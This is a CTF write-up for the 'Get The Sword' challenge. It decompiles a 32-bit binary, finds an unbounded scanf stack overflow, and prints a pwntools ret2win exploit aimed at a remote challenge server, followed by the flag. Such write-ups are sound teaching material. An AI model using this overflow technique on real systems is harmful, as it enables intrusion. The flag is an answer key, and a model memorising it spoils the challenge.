#  Get The Sword

{% file src="<https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FMdzuWj6vBCzNt8y3KprJ%2Fget_sword?alt=media&token=fcffd4fc-70b2-4fa9-a05f-9db1b7dea364>" %}

## <mark style="color:red;">Challenge Description :</mark>&#x20;

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FMKMu3ikRRPRLBZfeqfCs%2Fimage.png?alt=media&#x26;token=fd843265-0511-470c-89d9-a2348c00030e" alt=""><figcaption></figcaption></figure></div>

### <mark style="color:blue;">Basic Binary Enumeration :</mark>&#x20;

we can see that the binary is 32 bit not stripped that means that the functions names are not obfuscated and all the protections are off

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FoyMu3btr4uIB9aioue5R%2Fimage.png?alt=media&#x26;token=37b8bd68-23a3-449f-b373-e3d4aedfa04c" alt=""><figcaption></figcaption></figure></div>

let's open the binary in ghidra to analyze it and find potential vulnerabilities

we have 4 functions

```c
undefined4 main(void)
{
  printSword();
  intro();
  return 0;
}

void printSword(void)

{
  puts("      />_________________________________");
  puts("[#####[]_________________________________>");
  puts("      \\>");
  fflush(stdout);
  return;
}

void intro(void)

{
  undefined local_20 [24];
  
  printf("What do you want ? ?: ");
  fflush(stdout);
  __isoc99_scanf(&%s,local_20); // BOF vulnerability
  printf("You want, %s\n",local_20);
  return;
}

// win function
void getSword(void)

{
  system("cat flag.txt");
  fflush(stdout);
  return;
}
```

the function intro is vulnerable since it reads from the user without checking the size of the data received.

### <mark style="color:blue;">Offset to EIP :</mark>&#x20;

we can use gdb to find the offset and we can also use ghidra.

in ghidra we can see that the offset to reach the EIP is 0x20 which 32

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FtcuxJDbNeuJDLanjlCg5%2Fimage.png?alt=media&#x26;token=b9876e12-7194-441a-a567-14712fff40b8" alt=""><figcaption></figcaption></figure></div>

### <mark style="color:blue;">Exploit :</mark>&#x20;

```python
from pwn import *

# Set up pwntools for the correct architecture
exe = './get_sword'
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'info'
#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================
# io = process(exe)
io = remote('173.255.201.51', 31337)
offset = 32
ret = 0x0804900e #ret gadget (ropper --file=ret2win --search="ret") 
payload = flat(
	offset * b'A',
	elf.functions.getSword
)

io.sendlineafter(b':', payload)

io.interactive()
```

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FgPZcRz4sPYjkw1pghnN5%2Fimage.png?alt=media&#x26;token=d61e18b4-2a82-49de-b744-134404297b3b" alt=""><figcaption></figcaption></figure></div>

### <mark style="color:blue;">Flag :</mark>&#x20;

```
KCTF{so_you_g0t_the_sw0rd}
```